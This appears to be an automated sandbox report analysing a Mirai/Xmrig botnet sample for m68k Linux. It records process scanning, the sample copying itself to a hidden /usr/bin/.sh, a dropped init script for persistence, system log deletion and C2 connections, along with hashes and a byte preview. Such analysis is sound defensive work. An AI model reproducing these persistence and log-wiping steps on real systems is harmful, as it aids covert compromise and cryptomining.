                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/240/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/120/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3094/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/121/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/242/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3406/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/122/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/243/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/2/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/123/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/244/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1589/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/124/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/245/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1588/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/125/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/4/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/246/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3402/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/126/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/5/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/247/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/127/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/6/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/248/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/128/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/7/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/249/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/8/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/129/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/800/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/9/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/801/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/803/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/20/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/806/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/21/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/807/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/928/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/22/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/23/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/24/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/25/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/26/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/27/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/28/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/29/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3420/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/490/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/250/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/130/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/251/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/131/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/252/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/132/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/253/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/254/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/255/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/135/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/256/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1599/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/257/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/378/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/258/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/3412/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/259/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/30/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/35/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/1371/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/260/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File opened: /proc/261/cmdlineJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5817)Shell command executed: sh -c "cp /tmp/morte.m68k.elf /usr/bin/.sh"Jump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File: /etc/init.d/sysd (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                    Source: /usr/bin/cp (PID: 5822)File written: /usr/bin/.shJump to dropped file
                    Source: /tmp/morte.m68k.elf (PID: 5808)Writes shell script file to disk with an unusual file extension: /etc/init.d/sysdJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: /tmp/morte.m68k.elf (PID: 5829)Log files deleted: /var/log/kern.logJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5829)Log files deleted: /var/log/Xorg.1.logJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5829)Log files deleted: /var/log/auth.logJump to behavior
                    Source: /tmp/morte.m68k.elf (PID: 5808)File: /etc/init.d/sysdJump to dropped file
                    Source: /usr/bin/cp (PID: 5822)File: /usr/bin/.shJump to dropped file
                    Source: /usr/bin/cp (PID: 5822)ELF file: /usr/bin/.shJump to dropped file
                    Source: /tmp/morte.m68k.elf (PID: 5804)Queries kernel information via 'uname': Jump to behavior
                    Source: morte.m68k.elf, 5804.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmp, morte.m68k.elf, 5806.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/morte.m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/morte.m68k.elf
                    Source: morte.m68k.elf, 5804.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmp, morte.m68k.elf, 5806.1.00007ffc37f17000.00007ffc37f38000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
                    Source: morte.m68k.elf, 5804.1.000056084165b000.00005608416bf000.rw-.sdmp, morte.m68k.elf, 5806.1.000056084165b000.00005608416bf000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
                    Source: morte.m68k.elf, 5804.1.000056084165b000.00005608416bf000.rw-.sdmp, morte.m68k.elf, 5806.1.000056084165b000.00005608416bf000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/m68k

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: morte.m68k.elf, type: SAMPLE
                    Source: Yara matchFile source: 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: morte.m68k.elf PID: 5804, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: morte.m68k.elf PID: 5806, type: MEMORYSTR
                    Source: Yara matchFile source: /usr/bin/.sh, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: morte.m68k.elf, type: SAMPLE
                    Source: Yara matchFile source: 5804.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: 5806.1.00007fc93c001000.00007fc93c01a000.r-x.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: morte.m68k.elf PID: 5804, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: morte.m68k.elf PID: 5806, type: MEMORYSTR
                    Source: Yara matchFile source: /usr/bin/.sh, type: DROPPED
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information2
                    Scripting
                    Valid AccountsWindows Management Instrumentation2
                    Scripting
                    Path Interception1
                    Masquerading
                    1
                    OS Credential Dumping
                    11
                    Security Software Discovery
                    Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network Medium1
                    Data Manipulation
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    File and Directory Permissions Modification
                    LSASS Memory1
                    File and Directory Discovery
                    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Hidden Files and Directories
                    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Indicator Removal
                    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    No configs have been found
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Number of created Files
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1729418 Sample: morte.m68k.elf Startdate: 06/07/2025 Architecture: LINUX Score: 100 39 65.222.202.53, 80 CAPEREGIONALHEALTHSYSTEMUS United States 2->39 41 Antivirus detection for dropped file 2->41 43 Antivirus / Scanner detection for submitted sample 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 2 other signatures 2->47 10 morte.m68k.elf 2->10         started        13 gvfsd-fuse fusermount 2->13         started        15 python3.8 gdbus 2->15         started        signatures3 process4 signatures5 55 Found strings related to Crypto-Mining 10->55 17 morte.m68k.elf 10->17         started        57 Sample reads /proc/mounts (often used for finding a writable filesystem) 13->57 process6 process7 19 morte.m68k.elf 17->19         started        file8 35 /etc/init.d/sysd, POSIX 19->35 dropped 49 Sample tries to set files in /etc globally writable 19->49 51 Drops files in suspicious directories 19->51 53 Sample tries to persist itself using System V runlevels 19->53 23 morte.m68k.elf sh 19->23         started        25 morte.m68k.elf 19->25         started        signatures9 process10 process11 27 sh cp 23->27         started        31 morte.m68k.elf 25->31         started        33 morte.m68k.elf 25->33         started        file12 37 /usr/bin/.sh, ELF 27->37 dropped 59 Drops invisible ELF files 27->59 61 Drops files in suspicious directories 27->61 63 Manipulation of devices in /dev 31->63 65 Deletes system log files 31->65 signatures13

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    morte.m68k.elf50%VirustotalBrowse
                    morte.m68k.elf58%ReversingLabsLinux.Worm.Mirai
                    morte.m68k.elf100%AviraLINUX/Mirai.bonb
                    SourceDetectionScannerLabelLink
                    /usr/bin/.sh100%AviraLINUX/Mirai.bonb
                    /etc/init.d/sysd0%VirustotalBrowse
                    /usr/bin/.sh58%ReversingLabsLinux.Worm.Mirai
                    /usr/bin/.sh50%VirustotalBrowse
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    65.222.202.53
                    unknownUnited States394096CAPEREGIONALHEALTHSYSTEMUSfalse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    65.222.202.53morte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                      morte.ppc.elfGet hashmaliciousMirai, XmrigBrowse
                        morte.sh4.elfGet hashmaliciousMirai, XmrigBrowse
                          debug.elfGet hashmaliciousMirai, XmrigBrowse
                            morte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                              morte.arm.elfGet hashmaliciousMirai, XmrigBrowse
                                morte.arm.elfGet hashmaliciousMirai, XmrigBrowse
                                  morte.sh4.elfGet hashmaliciousMirai, XmrigBrowse
                                    morte.mips.elfGet hashmaliciousMirai, XmrigBrowse
                                      morte.mips.elfGet hashmaliciousMirai, XmrigBrowse
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CAPEREGIONALHEALTHSYSTEMUSmorte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.ppc.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.sh4.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        debug.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.arm.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.arm.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.sh4.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.mips.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        morte.mips.elfGet hashmaliciousMirai, XmrigBrowse
                                        • 65.222.202.53
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        /etc/init.d/sysdmorte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                                          morte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                                            morte.ppc.elfGet hashmaliciousMirai, XmrigBrowse
                                              morte.sh4.elfGet hashmaliciousMirai, XmrigBrowse
                                                debug.elfGet hashmaliciousMirai, XmrigBrowse
                                                  morte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                                                    morte.arm7.elfGet hashmaliciousMirai, XmrigBrowse
                                                      morte.x86_64.elfGet hashmaliciousMirai, XmrigBrowse
                                                        morte.arm.elfGet hashmaliciousMirai, XmrigBrowse
                                                          morte.arm.elfGet hashmaliciousMirai, XmrigBrowse
                                                            Process:/tmp/morte.m68k.elf
                                                            File Type:POSIX shell script, ASCII text executable
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):3.5892750707107135
                                                            Encrypted:false
                                                            SSDEEP:3:TKH4v09vzn:hw
                                                            MD5:997CB34FF6E6CDED70B841C0D16C0938
                                                            SHA1:CC85C16E2FB441D86AA668F376CA7FB4B181F1AB
                                                            SHA-256:BA1D50D125344F273C249426CCD744D5A12E560ACE41CCA4BC55BD2D4A718D8F
                                                            SHA-512:1E775CA8513F2841B6A8E369071B28C48489AB6462D06525F9B6B2BF97E9C043562BD7E0217307ED64A95217A76A94A08189616831C9D3127C6B91B7544570C8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: morte.arm7.elf, Detection: malicious, Browse
                                                            • Filename: morte.arm7.elf, Detection: malicious, Browse
                                                            • Filename: morte.ppc.elf, Detection: malicious, Browse
                                                            • Filename: morte.sh4.elf, Detection: malicious, Browse
                                                            • Filename: debug.elf, Detection: malicious, Browse
                                                            • Filename: morte.arm7.elf, Detection: malicious, Browse
                                                            • Filename: morte.arm7.elf, Detection: malicious, Browse
                                                            • Filename: morte.x86_64.elf, Detection: malicious, Browse
                                                            • Filename: morte.arm.elf, Detection: malicious, Browse
                                                            • Filename: morte.arm.elf, Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:#!/bin/sh./usr/bin/.sh &.
                                                            Process:/tmp/morte.m68k.elf
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):20
                                                            Entropy (8bit):3.6841837197791887
                                                            Encrypted:false
                                                            SSDEEP:3:TgnRACdOw5:TgnRARC
                                                            MD5:2DDDAFE67DAC89013EC667D94670D5C6
                                                            SHA1:5EC0B3118235A4AC652DA1DF859F7D3E7E327E03
                                                            SHA-256:8A2ED2EFB48F8A309D99C9F15198C0FB52249098238E5A6CF0AC0EED3B9507D9
                                                            SHA-512:6B63656786D5FAF8C513E3DDF693ADF25F5C043D2F3A0F8797F010DA86270A38EA6C548CE3C1787264268E3D3D22A4A267ECEF4248B6E2A85B14F2E23E6547C6
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/tmp/morte.m68k.elf.
                                                            Process:/usr/bin/cp
                                                            File Type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                            Category:dropped
                                                            Size (bytes):101752
                                                            Entropy (8bit):6.159504859669253
                                                            Encrypted:false
                                                            SSDEEP:3072:lVxnK69C7HFe9rkP4IgDXTC44/CR8jnbB:JnKl7HU6QXTN4vjbB
                                                            MD5:FD9877FCD67CDA3221F58731BCD32B54
                                                            SHA1:3873A5EEFC7E1BD4438740BBCABD3B12A8615856
                                                            SHA-256:C2F553CBE5BF2DD338B6C9D22ED8E8F1687431FA3404C9E7D2B3DDC46F958797
                                                            SHA-512:0BD7F119F793A53B856D27EBD33BB1D6D2BA4DF05A96425DC5A10217B519DE4DFF2E5F3F8D35CA9E4EC671E32A6BD08194F3FD0E6B546A725BADF470948E5D5A
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /usr/bin/.sh, Author: Joe Security
                                                            • Rule: JoeSecurity_Mirai_3, Description: Yara detected Mirai, Source: /usr/bin/.sh, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                            • Antivirus: Virustotal, Detection: 50%, Browse
                                                            Reputation:low
                                                            Preview:.ELF.......................D...4.........4. ...(.................................. ............................... .dt.Q............................NV..a....da...S8N^NuNV..J9....f>"y...( QJ.g.X.#...(N."y...( QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuNV..A.....J.g.Hy....Hy....N.P.J.... g.A.....J.g.Hy... N.X.N^NuNV..N^Nu.. . OHWHQHy..T.Hy....HP/.Hy..sNN.....J.H.8. o..(/.../..B../..J.o .(..g.C...B.R...g. I.)..\...f.(. D .L...NuNV..H.8 ............E.....N.r...g...J.g.J.....f...#.....`...N.r...g J.f$/...a.....a....|Hx../.a....XB.a.....B..9....J.o."y.... Q.(..g.X.B.R...g. Y.(..f./...B..././...B.../. PN.O...B.a.....L.....N^NuH.8."o..(/.../..B../..J.g0...)..g.A...B.R...g."H.(..\...f. .g./.a.....(.X. .L...NuH.8."o..(/.../..B../..J.g4...)..g.A...B.R...g "H.(..\...f. .g.Hx../.a....J(.P. .L...NuO...H.?>$o.<$/.@p...d...,..<....g....*......g...A... .[.....g...J.g.....g...(.].......(@...*....b...G...Hx../.a.....,HP.J.o.A...C.X. ..k....Z.1|....!P..A.....f. ....(.].J.f...B..0J.g./.a....X.J..0g.
                                                            File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                            Entropy (8bit):6.159504859669253
                                                            TrID:
                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                            File name:morte.m68k.elf
                                                            File size:101'752 bytes
                                                            MD5:fd9877fcd67cda3221f58731bcd32b54
                                                            SHA1:3873a5eefc7e1bd4438740bbcabd3b12a8615856
                                                            SHA256:c2f553cbe5bf2dd338b6c9d22ed8e8f1687431fa3404c9e7d2b3ddc46f958797
                                                            SHA512:0bd7f119f793a53b856d27ebd33bb1d6d2ba4df05a96425dc5a10217b519de4dff2e5f3f8d35ca9e4ec671e32a6bd08194f3fd0e6b546a725badf470948e5d5a
                                                            SSDEEP:3072:lVxnK69C7HFe9rkP4IgDXTC44/CR8jnbB:JnKl7HU6QXTN4vjbB
                                                            TLSH:C1A33ACAF400DDBDF84FDABB4463090AB570E3521A835F376267BE53BD361944922E86
                                                            File Content Preview:.ELF.......................D...4.........4. ...(.................................. ............................... .dt.Q............................NV..a....da...S8N^NuNV..J9....f>"y...( QJ.g.X.#....(N."y...( QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

                                                            ELF header

                                                            Class:ELF32
                                                            Data:2's complement, big endian
                                                            Version:1 (current)
                                                            Machine:MC68000
                                                            Version Number:0x1
                                                            Type:EXEC (Executable file)
                                                            OS/ABI:UNIX - System V
                                                            ABI Version:0
                                                            Entry Point Address:0x80000144
                                                            Flags:0x0
                                                            ELF Header Size:52
                                                            Program Header Offset:52
                                                            Program Header Size:32
                                                            Number of Program Headers:3
                                                            Section Header Offset:101352
                                                            Section Header Size:40
                                                            Number of Section Headers:10
                                                            Header String Table Index:9
                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                            NULL0x00x00x00x00x0000
                                                            .initPROGBITS0x800000940x940x140x00x6AX002
                                                            .textPROGBITS0x800000a80xa80x153620x00x6AX004
                                                            .finiPROGBITS0x8001540a0x1540a0xe0x00x6AX002
                                                            .rodataPROGBITS0x800154180x154180x32f10x00x2A002
                                                            .ctorsPROGBITS0x8001a7100x187100x80x00x3WA004
                                                            .dtorsPROGBITS0x8001a7180x187180x80x00x3WA004
                                                            .dataPROGBITS0x8001a7240x187240x4840x00x3WA004
                                                            .bssNOBITS0x8001aba80x18ba80xa3180x00x3WA004
                                                            .shstrtabSTRTAB0x00x18ba80x3e0x00x0001
                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            LOAD0x00x800000000x800000000x187090x187096.18580x5R E0x2000.init .text .fini .rodata
                                                            LOAD0x187100x8001a7100x8001a7100x4980xa7b03.35890x6RW 0x2000.ctors .dtors .data .bss
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 6, 2025 08:13:08.163383961 CEST3751880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:09.175633907 CEST3751880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:11.191521883 CEST3751880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:15.383251905 CEST3751880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:21.736421108 CEST3752080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:22.742986917 CEST3752080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:24.759057999 CEST3752080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:28.950891972 CEST3752080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:35.822384119 CEST3752280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:36.854379892 CEST3752280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:38.870383978 CEST3752280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:43.030230999 CEST3752280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:49.557105064 CEST3752480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:50.582061052 CEST3752480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:52.597839117 CEST3752480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:13:56.853718996 CEST3752480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:03.148118019 CEST3752680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:04.149282932 CEST3752680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:06.165215969 CEST3752680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:10.421106100 CEST3752680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:16.817308903 CEST3752880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:17.844773054 CEST3752880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:19.860723972 CEST3752880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:23.988642931 CEST3752880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:30.201353073 CEST3753080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:31.220314980 CEST3753080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:33.236224890 CEST3753080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:37.300105095 CEST3753080192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:43.599756002 CEST3753280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:44.627672911 CEST3753280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:46.643606901 CEST3753280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:50.867528915 CEST3753280192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:57.014460087 CEST3753480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:14:58.035147905 CEST3753480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:00.051094055 CEST3753480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:04.178870916 CEST3753480192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:10.392350912 CEST3753680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:11.410621881 CEST3753680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:13.426512957 CEST3753680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:17.490370035 CEST3753680192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:24.501507044 CEST3753880192.168.2.1465.222.202.53
                                                            Jul 6, 2025 08:15:25.522176981 CEST3753880192.168.2.1465.222.202.53
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 6, 2025 08:13:07.730364084 CEST4518953192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:07.816135883 CEST53451898.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:07.817270041 CEST3278653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:07.902853012 CEST53327868.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:07.903826952 CEST5246153192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:07.989547968 CEST53524618.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:07.990580082 CEST5732853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:08.076251030 CEST53573288.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:08.077269077 CEST5502353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:08.162771940 CEST53550238.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:21.301404953 CEST5056353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:21.387223005 CEST53505638.8.8.8192.168.2.14
